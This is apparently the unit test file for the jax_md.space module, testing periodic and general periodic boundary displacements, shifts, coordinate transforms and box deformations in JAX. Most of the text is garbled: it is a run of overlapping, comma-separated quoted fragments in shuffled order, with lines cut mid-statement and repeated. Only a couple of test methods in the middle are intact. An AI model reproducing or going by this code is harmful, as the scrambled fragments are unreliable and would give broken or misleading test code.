1.0, dim) box = dtype(box_size) if box_format == 'vector':", "POSITION_DTYPE)) def test_transform(self, spatial_dimension, dtype): key = random.PRNGKey(0) for _", "= jnp.where(dR > 0.49, f32(0.49), dR) dR = jnp.where(dR <", "dtype=dtype) self.assertAllClose( disp_fn(R, R), jnp.array(true_disp_fn(R, R), dtype=dtype)) self.assertAllClose( shift_fn(R, dR,", "(s, E), (s_gf, E_gf), (s_g, E_g) # pylint: disable=invalid-name class", "dtype, box_format) self.assertAllClose(E(R), E_gf(R_f)) self.assertAllClose(E(R), E_g(R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}',", "unwrapped_shift(unwrapped_R, dR) self.assertAllClose( displacement(R, R0), displacement(unwrapped_R, R0)) assert not (jnp.all(unwrapped_R", "{ 'testcase_name': '_dim={}'.format(dim), 'spatial_dimension': dim } for dim in SPATIAL_DIMENSION))", "box * 0.9 self.assertAllClose(grad(E_gf)(R_f, box=deformed_box), grad(E_g)(R, new_box=deformed_box)) self.assertAllClose(jacfwd(E_gf)(R_f, box=deformed_box), jacfwd(E_g)(R,", "deformed_box = box * 0.9 R_new = s_g(R, grad(E_g)(R), new_box=deformed_box)", "box * 0.9 R_new = s_g(R, grad(E_g)(R), new_box=deformed_box) R_gf_new =", "10 STOCHASTIC_SAMPLES = 10 SHIFT_STEPS = 10 SPATIAL_DIMENSION = [2,", "in BOX_FORMATS)) def test_periodic_general_deform_grad(self, spatial_dimension, dtype, box_format): N = 16", "'matrix' else box) d_gf, s_gf = space.periodic_general(box) d_g, s_g =", "E_g(R, new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype,", "Licensed under the Apache License, Version 2.0 (the \"License\"); #", "for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_shift(self,", "writing, software # distributed under the License is distributed on", "split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = 
jnp.sqrt(f32(0.1)) * random.normal( split2,", "f64] else: POSITION_DTYPE = [f32] def make_periodic_general_test_system(N, dim, dtype, box_format):", "+ jnp.transpose(dT) R = random.uniform( split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R0", "dR = random.normal( split3, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) disp_fn, shift_fn =", "max_box_size * random.uniform( split1, (spatial_dimension,), dtype=dtype) transform = jnp.diag(box_size) R", "true_disp_fn = space.map_product(true_disp_fn) R = random.uniform( split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)", "box_size dR = random.normal( split3, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) disp_fn, shift_fn", "'dtype': dtype } for dim in SPATIAL_DIMENSION for dtype in", "(spatial_dimension, spatial_dimension)) R_prime = space.transform(T, R) energy_direct = lambda R:", "FLAGS.jax_enable_x64: POSITION_DTYPE = [f32, f64] else: POSITION_DTYPE = [f32] def", "(s_gf, E_gf), (s_g, E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format)", "split1, split2, split3 = random.split(key, 4) max_box_size = f32(10.0) box_size", "split_T0_dT = random.split(key, 3) key, split_T1_scale, split_T1_dT = random.split(key, 3)", "random.normal( split_T1_dT, (spatial_dimension, spatial_dimension), dtype=dtype) T_1 = jnp.array(size_1 * (eye", "spatial_dimension): key = random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES): key, split1,", "T_0 = jnp.array(size_0 * (eye + dtransform_0), dtype=dtype) size_1 =", "dr_shifted.shape + (1,)) dR_direct = jnp.where( dr_shifted < dr_direct, dR_shifted,", "(spatial_dimension, spatial_dimension)) T_0 = jnp.array(size_0 * (eye + dtransform_0), dtype=dtype)", "+ dT + jnp.transpose(dT) R = random.uniform( split_R, (PARTICLE_COUNT, spatial_dimension),", "range(-1, 2): dR_shifted = dR + jnp.array([i, j], dtype=R.dtype) dr_shifted", "= 10.0 * random.uniform(split_T1_scale, (), dtype=dtype) dtransform_1 = 0.5 *", "dtype): key = random.PRNGKey(0) eye = jnp.eye(spatial_dimension) for _ in", "for dtype in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_deform_grad(self,", "N = 16 R_f, R, box, (s, E), (s_gf, E_gf),", "0.9 R_new = s_g(R, grad(E_g)(R), new_box=deformed_box) R_gf_new = space.transform(deformed_box, s_gf(R_f,", "general_grad_fn = grad(lambda R: jnp.sum(general_disp_fn(R, R) ** 2)) self.assertAllClose(grad_fn(R_scaled), general_grad_fn(R))", "assert shift_fn(R_scaled, dR).dtype == dtype @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),", "dT = random.normal( split_T, (spatial_dimension, spatial_dimension), dtype=dtype) T = eye", "(PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = jnp.sqrt(f32(0.1)) * random.normal( split2, (PARTICLE_COUNT,", "= 10.0 * random.uniform(split_T0_scale, ()) dtransform_0 = 0.5 * random.normal(", "jnp.transpose(dT) R = random.uniform( split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R0 =", "= space.periodic_general(jnp.eye(spatial_dimension)) metric = space.metric(displacement) test_metric = space.canonicalize_displacement_or_metric(displacement) metric =", "_ in range(STOCHASTIC_SAMPLES): key, split_R, split_T = random.split(key, 3) dT", "T = random.normal(split2, (spatial_dimension, spatial_dimension)) R_prime = space.transform(T, R) energy_direct", "R_prime = space.transform(T, R) self.assertAllClose(R_prime_exact, R_prime) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}'.format(dim),", "box_format 
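  # Note (ours): these two tests pin down the correspondence between the
  # orthorhombic and the general periodic space: with box vector b,
  # space.periodic(b) acts on real coordinates R_scaled = R * b while
  # space.periodic_general(jnp.diag(b)) acts on fractional coordinates R, so
  # displacements agree directly and general shifts are rescaled by b before
  # comparison.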
  @parameterized.named_parameters(jtu.cases_from_list(
      {
          'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),
          'spatial_dimension': dim,
          'dtype': dtype
      } for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE))
  def test_periodic_general_dynamic(self, spatial_dimension, dtype):
    key = random.PRNGKey(0)

    eye = jnp.eye(spatial_dimension)

    for _ in range(STOCHASTIC_SAMPLES):
      key, split_T0_scale, split_T0_dT = random.split(key, 3)
      key, split_T1_scale, split_T1_dT = random.split(key, 3)
      key, split_t, split_R, split_dR = random.split(key, 4)

      size_0 = 10.0 * random.uniform(split_T0_scale, ())
      dtransform_0 = 0.5 * random.normal(
          split_T0_dT, (spatial_dimension, spatial_dimension))
      T_0 = jnp.array(size_0 * (eye + dtransform_0), dtype=dtype)

      size_1 = 10.0 * random.uniform(split_T1_scale, (), dtype=dtype)
      dtransform_1 = 0.5 * random.normal(
          split_T1_dT, (spatial_dimension, spatial_dimension), dtype=dtype)
      T_1 = jnp.array(size_1 * (eye + dtransform_1), dtype=dtype)

      disp_fn, shift_fn = space.periodic_general(T_0)
      true_disp_fn, true_shift_fn = space.periodic_general(T_1)

      disp_fn = partial(disp_fn, box=T_1)

      disp_fn = space.map_product(disp_fn)
      true_disp_fn = space.map_product(true_disp_fn)

      R = random.uniform(
          split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
      dR = random.normal(
          split_dR, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)

      self.assertAllClose(
          disp_fn(R, R), jnp.array(true_disp_fn(R, R), dtype=dtype))
      self.assertAllClose(
          shift_fn(R, dR, box=T_1), jnp.array(true_shift_fn(R, dR), dtype=dtype))

  @parameterized.named_parameters(jtu.cases_from_list(
      {
          'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),
          'spatial_dimension': dim,
          'dtype': dtype
      } for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE))
  def test_periodic_general_wrapped_vs_unwrapped(
      self, spatial_dimension, dtype):
    key = random.PRNGKey(0)

    eye = jnp.eye(spatial_dimension, dtype=dtype)

    tol = 1e-13
    if dtype is f32:
      tol = 2e-5

    for _ in range(STOCHASTIC_SAMPLES):
      key, split_R, split_T = random.split(key, 3)

      dT = random.normal(
          split_T, (spatial_dimension, spatial_dimension), dtype=dtype)
      T = eye + dT + jnp.transpose(dT)

      R = random.uniform(
          split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
      R0 = R
      unwrapped_R = R

      displacement, shift = space.periodic_general(T)
      _, unwrapped_shift = space.periodic_general(T, wrapped=False)

      displacement = space.map_product(displacement)

      for _ in range(SHIFT_STEPS):
        key, split = random.split(key)
        dR = random.normal(
            split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
        R = shift(R, dR)
        unwrapped_R = unwrapped_shift(unwrapped_R, dR)
        self.assertAllClose(
            displacement(R, R0), displacement(unwrapped_R, R0))
      assert not (jnp.all(unwrapped_R > 0) and jnp.all(unwrapped_R < 1))
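  # Note (ours): with wrapped=False the shift function lets positions leave
  # the unit cell instead of remapping them into [0, 1)^dim. Periodic
  # displacements are insensitive to wrapping, which is exactly what the
  # loop asserts; the final assert checks that at least one particle really
  # did wander outside the cell, so the comparison is not vacuous.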
\"\"\"Tests for", "(PARTICLE_COUNT, spatial_dimension), dtype=dtype) T = random.normal( split2, (spatial_dimension, spatial_dimension), dtype=dtype)", "# you may not use this file except in compliance", "_, unwrapped_shift = space.periodic_general(T, wrapped=False) displacement = space.map_product(displacement) for _", "R.dtype self.assertAllClose(dR_after, dR) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim,", "from jax import grad, jit, jacfwd from jax import test_util", "> 0.49, f32(0.49), dR) dR = jnp.where(dR < -0.49, f32(-0.49),", "dR = jnp.where(dR < -0.49, f32(-0.49), dR) R_shift = space.periodic_shift(f32(1.0),", "disp_fn = space.map_product(disp_fn) true_disp_fn = space.map_product(true_disp_fn) R = random.uniform( split_R,", "spatial_dimension, dtype): key = random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES): key,", "= s(R, grad(E)(R)) R_gf_new = s_gf(R_f, grad(E_gf)(R_f)) R_g_new = s_g(R,", "dtype, box_format) R_new = s(R, grad(E)(R)) R_gf_new = s_gf(R_f, grad(E_gf)(R_f))", "dR) R_shift = space.periodic_shift(f32(1.0), R, dR) assert R_shift.dtype == R.dtype", "spatial_dimension, dtype): key = random.PRNGKey(0) displacement, _ = space.periodic_general(jnp.eye(spatial_dimension)) metric", "assert jnp.all(R_shift > 0.0) dR_after = space.periodic_displacement(f32(1.0), R_shift - R)", "displacement(R, R0), displacement(unwrapped_R, R0)) assert not (jnp.all(unwrapped_R > 0) and", "dR dr_direct = space.distance(dR) dr_direct = jnp.reshape(dr_direct, dr_direct.shape + (1,))", "dtype=dtype) R_scaled = R * box_size dR = random.normal( split3,", "dR = jnp.where(dR > 0.49, f32(0.49), dR) dR = jnp.where(dR", "random.uniform( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = jnp.sqrt(f32(0.1)) * random.normal(", "box=deformed_box), jacfwd(E_g)(R, new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype':", "for _ in range(SHIFT_STEPS): key, split = random.split(key) dR =", "= 1e-5 for _ in range(STOCHASTIC_SAMPLES): key, split1, split2 =", "dr_direct, dr_shifted, dr_direct) elif spatial_dimension == 3: for i in", "R_gf_new)) self.assertAllClose(R_new, R_g_new) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype':", "under the Apache License, Version 2.0 (the \"License\"); # you", "energy_direct = lambda R: jnp.sum(R ** 2) energy_indirect = lambda", "test_metric(R, R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype':", "split_T1_scale, split_T1_dT = random.split(key, 3) key, split_t, split_R, split_dR =", "E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) deformed_box = box", "import parameterized from jax.config import config as jax_config from jax", "box = jnp.array(jnp.ones(dim) * box_size, dtype) elif box_format == 'matrix':", "to JAX Issue #5849.') N = 16 R_f, R, box,", "space.metric(displacement) test_metric = space.canonicalize_displacement_or_metric(displacement) metric = space.map_product(metric) test_metric = space.map_product(test_metric)", "for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_general_wrapped_vs_unwrapped(", "(), dtype=dtype) dtransform_1 = 0.5 * 
random.normal( split_T1_dT, (spatial_dimension, spatial_dimension),", "= space.periodic_displacement(f32(1.0), R_shift - R) assert dR_after.dtype == R.dtype self.assertAllClose(dR_after,", "an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF", "random.PRNGKey(0) eye = jnp.eye(spatial_dimension) for _ in range(STOCHASTIC_SAMPLES): key, split_T0_scale,", "unittest import SkipTest test_util.update_test_tolerance(5e-5, 5e-13) jax_config.parse_flags_with_absl() jax_config.enable_omnistaging() FLAGS = jax_config.FLAGS", "= jax_config.FLAGS PARTICLE_COUNT = 10 STOCHASTIC_SAMPLES = 10 SHIFT_STEPS =", "SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_general_wrapped_vs_unwrapped( self, spatial_dimension, dtype):", "dtype is f32: tol = 2e-5 for _ in range(STOCHASTIC_SAMPLES):", "= box * 0.9 self.assertAllClose(grad(E_gf)(R_f, box=deformed_box), grad(E_g)(R, new_box=deformed_box)) self.assertAllClose(jacfwd(E_gf)(R_f, box=deformed_box),", "= space.map_product(displacement) for _ in range(SHIFT_STEPS): key, split = random.split(key)", "in POSITION_DTYPE)) def test_periodic_shift(self, spatial_dimension, dtype): key = random.PRNGKey(0) for", "space.map_product(space.pairwise_displacement)(R, R) dR_wrapped = space.periodic_displacement(f32(1.0), dR) dR_direct = dR dr_direct", "R_shift = space.periodic_shift(f32(1.0), R, dR) assert R_shift.dtype == R.dtype assert", "test_util.update_test_tolerance(5e-5, 5e-13) jax_config.parse_flags_with_absl() jax_config.enable_omnistaging() FLAGS = jax_config.FLAGS PARTICLE_COUNT = 10", "a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 #", "box_format } for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE", "space.transform(box, R_gf_new)) self.assertAllClose(R_new, R_g_new) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim,", "dtype, box_format) self.assertAllClose(grad(E)(R), grad(E_gf)(R_f)) self.assertAllClose(grad(E)(R), grad(E_g)(R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}',", "\\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) self.assertAllClose(E(R), E_gf(R_f)) self.assertAllClose(E(R), E_g(R)) @parameterized.named_parameters(jtu.cases_from_list(", "= random.normal( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) self.assertAllClose(metric(R, R), test_metric(R, R))", "dR + jnp.array([i, j, k], dtype=R.dtype) dr_shifted = space.distance(dR_shifted) dr_shifted", "= space.periodic_general(T) _, unwrapped_shift = space.periodic_general(T, wrapped=False) displacement = space.map_product(displacement)", "jax_config.parse_flags_with_absl() jax_config.enable_omnistaging() FLAGS = jax_config.FLAGS PARTICLE_COUNT = 10 STOCHASTIC_SAMPLES =", "key, split = random.split(key) R = random.uniform( split, (PARTICLE_COUNT, spatial_dimension),", "box_format) deformed_box = box * 0.9 self.assertAllClose(E_gf(R_f, box=deformed_box), E_g(R, new_box=deformed_box))", "test_periodic_general_wrapped_vs_unwrapped( self, spatial_dimension, dtype): key = random.PRNGKey(0) eye = jnp.eye(spatial_dimension,", "dr_direct = jnp.where(dr_shifted < dr_direct, dr_shifted, dr_direct) elif spatial_dimension ==", "spatial_dimension, dtype, box_format) deformed_box = box * 0.9 self.assertAllClose(E_gf(R_f, box=deformed_box),", "* 0.9 self.assertAllClose(grad(E_gf)(R_f, box=deformed_box), grad(E_g)(R, 
new_box=deformed_box)) self.assertAllClose(jacfwd(E_gf)(R_f, box=deformed_box), jacfwd(E_g)(R, new_box=deformed_box))", "R_new = s(R, grad(E)(R)) R_gf_new = s_gf(R_f, grad(E_gf)(R_f)) R_g_new =", "size_1 = 10.0 * random.uniform(split_T1_scale, (), dtype=dtype) dtransform_1 = 0.5", "['scalar', 'vector', 'matrix'] if FLAGS.jax_enable_x64: POSITION_DTYPE = [f32, f64] else:", "shift_fn(R_scaled, dR).dtype == dtype @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension':", "eye = jnp.eye(spatial_dimension, dtype=dtype) tol = 1e-13 if dtype is", "s(R, grad(E)(R)) R_gf_new = s_gf(R_f, grad(E_gf)(R_f)) R_g_new = s_g(R, grad(E_g)(R))", "dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_against_periodic_general(self, spatial_dimension,", "= random.PRNGKey(0) eye = jnp.eye(spatial_dimension) for _ in range(STOCHASTIC_SAMPLES): key,", "spatial_dimension, dtype, box_format) R_new = s(R, grad(E)(R)) R_gf_new = s_gf(R_f,", "split1, split2 = random.split(key, 3) R = random.uniform( split1, (PARTICLE_COUNT,", "10 SHIFT_STEPS = 10 SPATIAL_DIMENSION = [2, 3] BOX_FORMATS =", "general_disp_fn, general_shift_fn = space.periodic_general(transform) disp_fn = space.map_product(disp_fn) general_disp_fn = space.map_product(general_disp_fn)", "key, split_t, split_R, split_dR = random.split(key, 4) size_0 = 10.0", "R_f, R, box, (s, E), (s_gf, E_gf), (s_g, E_g) #", "random.normal( split3, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) disp_fn, shift_fn = space.periodic(box_size) general_disp_fn,", "for box_format in BOX_FORMATS)) def test_periodic_general_force(self, spatial_dimension, dtype, box_format): N", "for _ in range(STOCHASTIC_SAMPLES): key, split1, split2, split3 = random.split(key,", "BOX_FORMATS)) def test_periodic_general_deform_shift(self, spatial_dimension, dtype, box_format): N = 16 R_f,", "= random.uniform( split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = random.normal( split_dR,", "= R displacement, shift = space.periodic_general(T) _, unwrapped_shift = space.periodic_general(T,", "R.dtype assert jnp.all(R_shift < 1.0) assert jnp.all(R_shift > 0.0) dR_after", "Apache License, Version 2.0 (the \"License\"); # you may not", "BOX_FORMATS)) def test_periodic_general_force(self, spatial_dimension, dtype, box_format): N = 16 R_f,", "either express or implied. 
# See the License for the", "* random.normal( split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = jnp.where(dR >", "License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by", "spatial_dimension, dtype, box_format): if box_format == 'scalar': raise SkipTest('Scalar case", "k], dtype=R.dtype) dr_shifted = space.distance(dR_shifted) dr_shifted = jnp.reshape(dr_shifted, dr_shifted.shape +", "for dtype in POSITION_DTYPE)) def test_periodic_against_periodic_general_grad(self, spatial_dimension, dtype): key =", "for dtype in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_shift(self,", "grad(E_g)(R)) self.assertAllClose(R_new, space.transform(box, R_gf_new)) self.assertAllClose(R_new, R_g_new) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}',", "'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype } for dim", "spatial_dimension, dtype, box_format) @grad def box_energy_g_fn(box): return E_g(R, new_box=box) @grad", "dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_canonicalize_displacement_or_metric(self, spatial_dimension,", "3) R = random.normal(split1, (PARTICLE_COUNT, spatial_dimension)) T = random.normal(split2, (spatial_dimension,", "dr_shifted, dr_direct) dR_direct = jnp.array(dR_direct, dtype=dR.dtype) assert dR_wrapped.dtype == dtype", "self.assertAllClose(grad(E_gf)(R_f, box=deformed_box), grad(E_g)(R, new_box=deformed_box)) self.assertAllClose(jacfwd(E_gf)(R_f, box=deformed_box), jacfwd(E_g)(R, new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list( {", "spatial_dimension)) T_0 = jnp.array(size_0 * (eye + dtransform_0), dtype=dtype) size_1", "= space.periodic_general(transform) disp_fn = space.map_product(disp_fn) general_disp_fn = space.map_product(general_disp_fn) self.assertAllClose(disp_fn(R_scaled, R_scaled),", "space.map_product(general_disp_fn) self.assertAllClose(disp_fn(R_scaled, R_scaled), general_disp_fn(R, R)) assert disp_fn(R_scaled, R_scaled).dtype == dtype", "tol = 2e-5 for _ in range(STOCHASTIC_SAMPLES): key, split_R, split_T", "= shift(R, dR) unwrapped_R = unwrapped_shift(unwrapped_R, dR) self.assertAllClose( displacement(R, R0),", "key, split1, split2 = random.split(key, 3) R = random.normal(split1, (PARTICLE_COUNT,", "the License. 
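  # Note (ours): the deform tests exercise the two ways of changing the box
  # after construction. In fractional coordinates the energy takes box=...
  # (the same fractional positions are reinterpreted in the deformed cell),
  # while with fractional_coordinates=False it takes new_box=...; both must
  # describe the same deformed state, here box * 0.9.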
\"\"\"Tests for jax_md.space.\"\"\" from absl.testing import absltest from", "general_disp_fn = space.map_product(general_disp_fn) grad_fn = grad(lambda R: jnp.sum(disp_fn(R, R) **", "(s_g, E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) @grad def", "POSITION_DTYPE)) def test_periodic_against_periodic_general_grad(self, spatial_dimension, dtype): key = random.PRNGKey(0) tol =", "spatial_dimension), dtype=dtype) dR = random.normal( split_dR, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) self.assertAllClose(", "= 10 SHIFT_STEPS = 10 SPATIAL_DIMENSION = [2, 3] BOX_FORMATS", "jnp.array(jnp.einsum('ij,kj->ki', T, R), dtype=dtype) R_prime = space.transform(T, R) self.assertAllClose(R_prime_exact, R_prime)", "= space.transform(T, R) energy_direct = lambda R: jnp.sum(R ** 2)", "shift_fn(R, dR, box=T_1), jnp.array(true_shift_fn(R, dR), dtype=dtype)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim,", "dtype(box_size) if box_format == 'vector': box = jnp.array(jnp.ones(dim) * box_size,", "== R.dtype assert jnp.all(R_shift < 1.0) assert jnp.all(R_shift > 0.0)", "spatial_dimension), dtype=dtype) R_scaled = R * box_size dR = random.normal(", "E_gf = jit(energy.soft_sphere_pair(d_gf)) E_g = jit(energy.soft_sphere_pair(d_g)) return R_f, R, box,", "test_periodic_general_dynamic(self, spatial_dimension, dtype): key = random.PRNGKey(0) eye = jnp.eye(spatial_dimension) for", "= random.normal(split1, (PARTICLE_COUNT, spatial_dimension)) T = random.normal(split2, (spatial_dimension, spatial_dimension)) R_prime", "distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR", "2) energy_indirect = lambda T, R: jnp.sum(space.transform(T, R) ** 2)", "4) size_0 = 10.0 * random.uniform(split_T0_scale, ()) dtransform_0 = 0.5", "jnp.sum(R ** 2) energy_indirect = lambda T, R: jnp.sum(space.transform(T, R)", "test_transform(self, spatial_dimension, dtype): key = random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES):", "jax_md.space.\"\"\" from absl.testing import absltest from absl.testing import parameterized from", "dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_general_dynamic(self, spatial_dimension,", "dR_wrapped = space.periodic_displacement(f32(1.0), dR) dR_direct = dR dr_direct = space.distance(dR)", "POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_energy(self, spatial_dimension, dtype, box_format):", "space.transform(deformed_box, s_gf(R_f, grad(E_gf)(R_f))) self.assertAllClose(R_new, R_gf_new) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension':", "= space.periodic_general(T_0) true_disp_fn, true_shift_fn = space.periodic_general(T_1) disp_fn = partial(disp_fn, box=T_1)", "R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype", "spatial_dimension == 3: for i in range(-1, 2): for j", "test_periodic_general_force(self, spatial_dimension, dtype, box_format): N = 16 R_f, R, box,", "# pylint: disable=invalid-name class SpaceTest(jtu.JaxTestCase): # pylint: disable=g-complex-comprehension @parameterized.named_parameters(jtu.cases_from_list( {", "= space.map_product(space.pairwise_displacement)(R, R) dR_wrapped = space.periodic_displacement(f32(1.0), dR) dR_direct = dR", "** 2) energy_indirect = lambda T, R: jnp.sum(space.transform(T, R) **", "for _ in 
range(STOCHASTIC_SAMPLES): key, split_R, split_T = random.split(key, 3)", "dtype in POSITION_DTYPE)) def test_transform(self, spatial_dimension, dtype): key = random.PRNGKey(0)", "new_box=box) @grad def box_energy_gf_fn(box): return E_gf(R_f, box=box) self.assertAllClose(box_energy_g_fn(box), box_energy_gf_fn(box)) if", "@parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype }", "= space.transform(deformed_box, s_gf(R_f, grad(E_gf)(R_f))) self.assertAllClose(R_new, R_gf_new) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}',", "** 2) grad_direct = grad(energy_direct)(R_prime) grad_indirect = grad(energy_indirect, 1)(T, R)", "jax import test_util as jtu from jax_md import space, test_util,", "= random.split(key, 3) R = random.normal(split1, (PARTICLE_COUNT, spatial_dimension)) T =", "= jnp.where( dr_shifted < dr_direct, dr_shifted, dr_direct) dR_direct = jnp.array(dR_direct,", "spatial_dimension), dtype=dtype) R = shift(R, dR) unwrapped_R = unwrapped_shift(unwrapped_R, dR)", "disp_fn = space.map_product(disp_fn) general_disp_fn = space.map_product(general_disp_fn) grad_fn = grad(lambda R:", "= random.normal( split_dR, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) self.assertAllClose( disp_fn(R, R), jnp.array(true_disp_fn(R,", "= random.split(key, 3) key, split_T1_scale, split_T1_dT = random.split(key, 3) key,", "* random.uniform(split_T0_scale, ()) dtransform_0 = 0.5 * random.normal( split_T0_dT, (spatial_dimension,", "== dtype @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype':", "+ (1,)) dR_direct = jnp.where( dr_shifted < dr_direct, dR_shifted, dR_direct)", "if box_format == 'vector': box = jnp.array(jnp.ones(dim) * box_size, dtype)", "in range(-1, 2): for j in range(-1, 2): for k", "use this file except in compliance with the License. 
#", "dim), dtype=dtype) R = space.transform(box, R_f) E = jit(energy.soft_sphere_pair(d)) E_gf", "= space.map_product(metric) test_metric = space.map_product(test_metric) for _ in range(STOCHASTIC_SAMPLES): key,", "dtype in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_grad_box(self, spatial_dimension,", "new_box=deformed_box) R_gf_new = space.transform(deformed_box, s_gf(R_f, grad(E_gf)(R_f))) self.assertAllClose(R_new, R_gf_new) @parameterized.named_parameters(jtu.cases_from_list( {", "class SpaceTest(jtu.JaxTestCase): # pylint: disable=g-complex-comprehension @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),", "general_shift_fn = space.periodic_general(transform) disp_fn = space.map_product(disp_fn) general_disp_fn = space.map_product(general_disp_fn) self.assertAllClose(disp_fn(R_scaled,", "R) self.assertAllClose(grad_direct, grad_indirect) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim,", "(jnp.all(unwrapped_R > 0) and jnp.all(unwrapped_R < 1)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "s_g(R, grad(E_g)(R)) self.assertAllClose(R_new, space.transform(box, R_gf_new)) self.assertAllClose(R_new, R_g_new) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "dR).dtype == dtype @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim,", "T = eye + dT + jnp.transpose(dT) R = random.uniform(", "for dtype in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_deform(self,", "= random.PRNGKey(0) R_f = random.uniform(key, (N, dim), dtype=dtype) R =", "split3 = random.split(key, 4) max_box_size = f32(10.0) box_size = max_box_size", "in POSITION_DTYPE)) def test_canonicalize_displacement_or_metric(self, spatial_dimension, dtype): key = random.PRNGKey(0) displacement,", "split2, (spatial_dimension, spatial_dimension), dtype=dtype) T_inv = space.inverse(T) R_test = space.transform(T_inv,", "spatial_dimension), dtype=dtype) R_prime_exact = jnp.array(jnp.einsum('ij,kj->ki', T, R), dtype=dtype) R_prime =", "2): for j in range(-1, 2): for k in range(-1,", "spatial_dimension), dtype=dtype) self.assertAllClose(metric(R, R), test_metric(R, R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim,", "dtype 